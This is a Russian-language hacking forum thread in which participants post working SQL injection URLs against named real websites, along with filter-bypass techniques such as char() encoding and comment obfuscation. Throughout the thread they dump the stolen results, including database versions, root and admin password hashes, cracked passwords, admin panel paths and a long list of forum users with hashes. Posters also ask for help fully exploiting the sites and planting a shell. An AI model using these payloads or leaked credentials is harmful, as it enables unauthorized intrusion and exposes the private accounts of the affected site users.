SQL Инъекции

www.ub.bw PR-6

version() - 5.0.51
file_priv - Y

к сожалению ковычки фильтруются, обходим их с помощью ASCII кодов...

PHP:

http://www.ub.bw/news.cfm?pid=221&t=-1+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user

PHP:

http://www.ub.bw/news.cfm?pid=221&t=-1+union+select+1,2,concat(user,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user

Два рута =)

 

http://www.adac.org.au/article.php?newsId=99999999945/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11/*

database() = [email protected]
user() = adac_org_au_-_content
version() = 4.1.11-Debian_4sarge7

вход в админку
www.adac.org.au/intranet.php

не подобрал поле пароля ..

пользователи:
5:jimmy
2:francz
3:helen
4:scott
6:byron
7:katie
8:warren
9:geoff
10:sharon

http://www.adac.org.au/article.php?newsId=99999999945/**/union/**/select/**/1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,userid,username),0x71),0x71),4,5,6,7,8,9,10,11/**/from/**/users/**/limit/**/8,1/*

 

Vsem prijatnogo vremeni sutak

ja vot nashol forum : http://89.136.42.95
No nekak nemogu razobratsa kak zdelot SQL injection . Moshet ktonibut obesnit

 

Saiga

Там нельзя ее сделать (вроде) ошибки на главной это просто какие то ошибки с обработкой базы mysql
А вообще тут на против есть тема для вопросов вот туда лучше обратиться

 

http://www.adac.org.au/article.php?newsId=99999999945/**/union/**/select/**/1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,userid,username,userpass),0x71),0x71),4,5,6,7,8,9,10,11/**/from/**/users/**/limit/**/8,1/*

 

kaspersky.fr

Version:5.0.38
User:adminsql@localhost

Помогите раскрутить инъекцию

 

http://www.zavodmonolit.ru/photos/index.php?id_group=-111/**/union/**/select/**/1,concat_ws(0x3a,table_name)+from+information_schema.tables+limit+22,1--
на ваш страх и риск -)
раскрутить не вышло или я что-то не так делаю Х_х

 

Blind:
http://buymebel.ru/index.php?pl=price&id=18+1,2,3,4,5,6,7--
http://buymebel.ru/index.php?pl=price&id=18+AND+ascii(lower(substring(version(),1,1)))=53--
Version: 5.*.*
имя юзера длинной 24 символа. руками подбирать лень >_<
________________________________
http://stroy-grup.ru/index.php?lang_id=1&menu_id=79+AND+ascii(lower(substring(version(),1,1)))=52--
Version: 4.*.*
________________________________
http://stove.ru/index.php?lng=&rs=116+AND+ascii(lower(substring(version(),1,1)))=53--
Version: 5.*.*

 

2 Calcutta
http://www.zavodmonolit.ru/photos/index.php?id_group=-111+UNION+SELECT+1,CONCAT_WS(0x3a,version(),user(),database())--

Database Version: 5.0.51a-community-nt
Database name: zavodmonolit
User name: zavodmonolit@localhost

http://www.zavodmonolit.ru/photos/index.php?id_group=-111+UNION+SELECT+1,CONCAT_WS(0x3a,user_pass)+FROM+monolit_users_table+LIMIT+0,1--

http://www.zavodmonolit.ru/admin/login_panel.php adminka

http://www.buymebel.ru/index.php?pl=price&id=18+UNION+SELECT+1,2,3,4,CONCAT_WS(0x3a,version(),user(),database()),6,7+LIMIT+1,1--

Database Version: 5.0.51a-log
Database name: buymebel_mebel
User name: buymebel_mebel@localhost


смотри получше это не слепая скуля..только в БД нет ничего интересного

http://www.stroy-grup.ru/index.php?lang_id=1&menu_id=79

Database Version: 4.0.27-log
User name: stroygr2_stroygr@localhost
Database name: stroygr2_stroygrup


http://stove.ru/index.php?lng=&rs=116+UNION+SELECT+CONCAT_WS(0x3a,version(),user(),database()),2,3,4,5,6+LIMIT+1,1/*

Database Version: 5.0.41-log
Database name: stove
User name: [email protected]

скуля тоже не слепая, так что мудрить с подзапросами не обязательно.Но похвально.Респект тебе чувак . но в БД опять таки ничего интересного нет..или может я ошибаюсь так как сильно не ковырял..

http://hydrosystems.ro/news.php?id=17+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),3,4,5,6,7/*

Database Version: 4.1.10a-Max
Database name: usr_web16_1
User name: web16@localhost

Дальше к сожалению не получилось подобрать табелки... кто сможет от меня респект

http://gardenia-antana.com/front/content.php?pr_id=-3+UNION+SELECT+1,CONCAT_WS(0x3a,user(),version(),database()),3,4--

Database Version: 4.1.22-log
Database name: gardenia
User name: gardant@localhost

http://www.news.rallybulgaria.com/news_detail_bg.php?r5=_5&idd=0000000166+UNION+SELECT+1,2,3,4,CONCAT_WS(0x3a,version(),user(),database()),6,7,8,9,10+LIMIT+1,1


Database Version: 4.1.22-log
Database name: rallyreplay
User name: rallybulgariacom@localhost

http://www.news.rallybulgaria.com/news_detail_bg.php?r5=_5&idd=0000000166+UNION+SELECT+1,2,3,4,CONCAT_WS(0x3a,id,mail,name,password),6,7,8,9,10+FROM+admins+LIMIT+1,1

0001:[email protected]:ivan:1
0002:[email protected]:Ivan:red
0003:[email protected]:Iasen:123456!


админку не искал...

http://www.gfialomita.ro/detal_presa.php?id=-62'+UNION+SELECT+1,CONCAT_WS(0x3a,user(),version(),database()),3,4,5/*

Database Version: 4.1.21-log
Database name: gfialomita
User name: root@localhost


http://www.gfialomita.ro/detal_presa.php?id=-62'+UNION+SELECT+1,CONCAT_WS(0x3a,password,user),3,4,5+FROM+mysql.user+LIMIT+0,1/*

[0]:7864ed0a46b1e475:root
[1]::root
[2]::
[3]::
[4]::root
[5]:*9CC04D6E974DFC9548D014670AF51FD1856CA3B9:root
[6]::root
[7]::root
[8]::root
[9]:*553DE232FFDE86F5BA68A54C95F97D86569AB6E4:vpopmailuser
[10]::root
[11]::root
[12]:*00A51F3F48415C7D4E8908980D443C29C69B60C9:roundcube
[13]:*9CC04D6E974DFC9548D014670AF51FD1856CA3B9:root
[14]:*4B9AEA4AAD6DD8F147DDDFECF02E0A8991FC4B8B:spamuser
[15]:*9CC04D6E974DFC9548D014670AF51FD1856CA3B9:root

Ребят, раскручивайте скули перед тем как сюда постить

всем спасибо

 

во, точно, не подставил куда надо -)
время уже завно за полночь перевалило, мало что соображаю уже -)
лови "+"

 

Подобрал пасс - zspJDYbBuwODc
Юзера не получиется(

//опередили =\

 

http://www.line6.ru/info.php?id=-4077'+union+select+1,2,3,concat_ws(0x3a,username,u%20ser_password,user_email),5,6,7,8,9+from+phpbb_user%20s/*

 

Это ведь хэш,его еще разшифроваь надо

 

сурс: http://www.pingpong.su/

5 мускул. Куча таблиц, несколько БД. Где-то среди многочисленных *adm_users* прячется истинный hash на http://www.pingpong.su/admin

Было лень копаться, сделал по phpbb:
http://www.pingpong.su/show_katalog.php?comp_id=-1+union+select+concat(username,0x3a,user_password)+from+phpbb_pingpong_users+limit+1,10/*&action=new

Login: kungpo
password: 59be2a162270a11b949010306c78754f удачно подбрутился: alex5

Пасс админа форума.

 

Если можно, гуру - гляньте, может шелл где присадить можно ? thx

 

Code:

http://metromir.ru/new_countries.php?id=-7%20union%20select%201,group_concat(table_name,0x3c62723e),3,4,5%20from%20information_schema.tables/*

Code:

http://promtractor.ru.titan.mtw.ru/eng/show_page.php?section=13&id=-5%20union%20select%201,2,3,4,5,6,7,8,9/*

 

Касперкой

Форум bb
[2]:admin:4d91567da38be2f1a4058f68e166224e - AMAP
[3]:Gadoux:bf64e931253d69d576b4347ab3d7b7cd
[4]:Johann:fa4e3b741f66e7d4301ddfa7fcecdb18
[5]:Test:098f6bcd4621d373cade4e832627b4f6
[6]:slb:ca50c20f09c7f71a23ebc686c4dcd5fa
[7]:M.Koletzki:d121ef4c27f2bf3510a6a5442ae837f0
[8]:test2:ad0234829205b9033196ba818f7a872b
[9]:nfournier:8eca54c4efaa8603cd3dd729dfa71f2d
[10]:kwchin:554d267fa4ce4351e1c9d89eea37b542
[11]:Franklin:e9646d086a37906e5bec4323d3b37c9b
[12]:Francesco:47000c3c0efa1ef622ac7dbc757fb4c9
[13]aul.Gaurd:34b7df049a96890ffcd4bfed6ce21cda
[14]:Fred:e10adc3949ba59abbe56e057f20f883e
[15]:Antony Lai:3716114b005e9b4e533c7f3cd0f4f253
[16]:Marcus:d836f1b5392cf4935752a8745dae1f21
[17]:Achim Flum:15dcad2a4a8242b1e22ab4d80c25ba67
[18]:Michaлl:b991ab37857382709f0ce0cc9e983a59
[19]aisuke Gonoi:1c6c80033f18d5af7279ee919b311800
[20]:Kumara:399f1109d5cbb6c918fc08776e1e9331
[21]:engels:42c30e6f00ca3cf18efe60b443692283
[22]:Jim_Lo:ccade42cdcd2f7a4e3b3e0426ad9fccd
[23]:charles79:e5a7f392d933b5bb4830fc6b50e4550e
[24]:MEKKI Mohamed:8f5c853566391602f1a56b305e1d9cd5
[25]livier.ako:cfc5adef048746dac83216290dcead5b
[26]:Manfred Hцller:8835b2fbc17349197534c5b78422eb93
[27]:tommychan:17510b05d6334018482e48a458264496
[28]:Nelson:2cb503f370d8c21bab19f472ab4f2dfb
[29]:Albert Lim:9c80993e1e086536e6781baa01f22886
[30]:Emily Su:ac0dd849f94cf31ffd487601cfaa4a41
[31]enguin.Zhou:8de531e942e4a5f2df9c57f563953886
[32]:Ajax Chen:aa0ade65f4f6e71ae9894ed98cf26cff
[33]:marc.niederhauser:e86a82e06073ff66d45fd33575c6bf62
[34]ennis Cho:2f76b398b509709779be8d9fa6bed403
[35]:Jose:350c9d901b7f1c73a481e240ec1b7c0b
[36]:sunny kim:7789f886eeea608c3bf406d1fd656489
[37]:campus_ne:6f2383a03bf27c6109e17c8e2ce48620
[38]:Bellevue:071931c0f79e043e513ce177d255d586
[39]:informatica.madrid:418a49d085d933aef5aa265a82705bd5
[40]:Federico:8f0a20e111a2823f837dd39886fddcb6
[41]:Helge:65ce068e5c9ae2c24b29d470994fe0f9
[42]:Oleg Omelchenko:ebb5041a45ec6db62eb99efc9c8c0b6c
[43]appacel:071931c0f79e043e513ce177d255d586
[44]ensom:fc58b89d7df2a019b6954ef0442efb3f
[45]:imran.faki:273abe22e7ba2307abd83aa4df6e0c1c
[46]:marionshaw:c3dc3962352a2be494bc56c7b7303fa9
[47]:xdeniau:4bdd9eb5c71b2549e03b0e2bf708940e
[48]:mbashar:a51df5ac1124c9ad99cf6c204ea53dec
[49]:coltmer:89244e0f5a920d56d08c82c68b99e876
[50]:JFiliano:f631417f13b0d675a4423863406151fd
[51]:faegerter:d3077f398a81cc537dcac6b4fb2eb9e8
[52]iaget:1ef12de62937b222cd8a6d321b005245
[53]:Jonathan Leung:ef0cc10ff462af3af3e15f592c4ec8da
[54]:[email protected]:0259580a1fb2541516a4ba16d6f310b3
[55]:matthew monkman:981f12cf3c50cff778d775da904efc2e
[56]:FSA:ac4460f8530e3a4e4e21558badb72a1b
[57]:Laurent.Marguier:655b8d280cd0d52b1e37a4dadb43f9a3
[58]:Chas.lankford:2ce4cf1a4e0776a9c23ddc8fb1087fdc
[59]:michvd:b1b5c11f85ad3b140db3278d580e78dd
[60]:Guillermo Romera:201976bb86f0ca41de07c13243769da0
[61]:Alexei:35cffef36aabe77ecaccefa53a4f5317
[62]hil Fei:9479cdbeecb0c3dd1b0a97b7e383e990
[63]badmin:1acf49879500f7a583fc20d2a505c527
[64]:tvos:a01183854d7e784f0455d559f4327d55
[65]:raul.contreras:4c84b0babfd962ec7c6823bd7e9f79bc
[66]:supmei:bf12d41d78a93a7ee50292a25596e4f0
[67]:nicolas.dain:d04f754b95d0615bf285ceae2a476abd
[68]:rcarrer:9a1364050d93fad0642cf2dd46964995
[69]:echrapow:b059c410930aa4f8490259138fc81585
[70]:Yvonne Spruce:9f05aa4202e4ce8d6a72511dc735cce9
[71]hilippe:d33dc5628def5da84e361f6b889a4ed8
[72]:[email protected]:0e06e290f09e2ed40e482d8b389858b1
[73]:seamus:aca7ab7d3c004cf4b119cb50e4e17fa7
[74]:florent.pt:67fff3535d17fd2c87b5a4231b5319c9
[75]:MICHEL:5acb5db1d21e997807ed9b02ba32ed34
[76]:hugo.marinho:09b7a8ed41bca894367b6c7881fe7a1c
[77]:mario.leonlaurent:de56c2c4bc0554a08a2e3bf12d358c18
[78]:jerome:c6fe7bebba8cc6a2492212adfa89bbd5
[79]:trevor:1cdd28cbda9775ee3746dae8acbd5747
[80]:Admin.Rodriguez:8b24894ba5c97046af2ab72545490fe0
[81]:amireche:5c13f1139c6bcc60756cb8032fd5d3ee
[82]:johann.collot:b8c584820a74d91c41ec856c41562078
========================================================
Стало быть админка =\ Поиском не занимался

[1]:9dd3ba637ec2fcaf383415617d39e002:System Administrator - пасс - 180872

==========================================
http://uinc.ru/news/sn10459.html - присоеденимся?)
=========================
[Смысл]

 

2 t0ox раскручивай скулю по мере возможности...тут есть еще что показать
http://promtractor.ru.titan.mtw.ru/eng/show_page.php?section=13&id=5+UNION+SELECT+1,2,3,4,CONCAT_WS(0x3a,version(),user(),database()),6,7,8,9/*

Database Version: 4.0.23-standard
Database name: db_promtractor1
User name: promtractor1@localhost

в БД подобрал только табелку news которая нам ничего не дает

вот отсюда тоже можно инфу интересную получить

ну а 2-я твоя скуля интересная..не понимаю зачем выкладывать если ее можно раскрутить по полной, правила читать надо
тИЦ: 550
PR: 4
http://metromir.ru/new_countries.php?id=-7+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5/*


Database Version: 5.1.22-rc
Database User: ramb@localhost
Database Name: 440

В БД много баз:
09_org_ru
09_stat
440
a440
admin
aff
all_stat
bagel
billibg
bussines
cinema
client
clent_adv
client_pay
com
com2
continium_com_ua
country_ochag
crimia
develop
directory
dmoz
dom4u_stat
dom_metromir_stat
UKR_INFO_PHORUM
Ukraine

http://metromir.ru/new_countries.php?id=-7+UNION+SELECT+1,concat_ws(0x3a,email,password),3,4,5+FROM+bagel.users+LIMIT+1,1/*

[0]:[email protected]:202cb962ac59075b964b07152d234b70 : 123
[1]:[email protected]:a01610228fe998f515a72dd730294d87 : 1212

http://metromir.ru/new_countries.php?id=-7+UNION+SELECT+1,concat_ws(0x3a,login,pw),3,4,5+FROM+billing.users+LIMIT+1,1/*

administrator:40be4e59b9a2a2b5dffb918c0e86b3d7 : welcome
xpgeek:96f8ab2b2f1a9f5d04a4d586ab656c75
и так далее

так как база большая, я сохранил все в файл , кому интересно поковырятся милости просим
click
всего доброго вам всем.Удачного дня !

 

Помогите раскрутить:
http://bikemaster.ru/popup_image1.php?pID=-1'union+select+1,concat(user_name,0x3a,user_passwo rd),3,4,5+from+administrators--
Также:
http://bikemaster.ru/popup_image1.php?pID=-1+union+select+1.2.concat(customers_lastname.0x3a. customers_password.0x3a.customers_email_address).4 .5.6.7.8+from+customers--
Не первый день занимаюсь им. Ничего не выходит(

 

РАЗВРАТНЫЕ ПОРНО ФОТО ГАЛЕРЕИ

version(): 3.23.56-log
user(): hardru@localhost
database(): hardru_net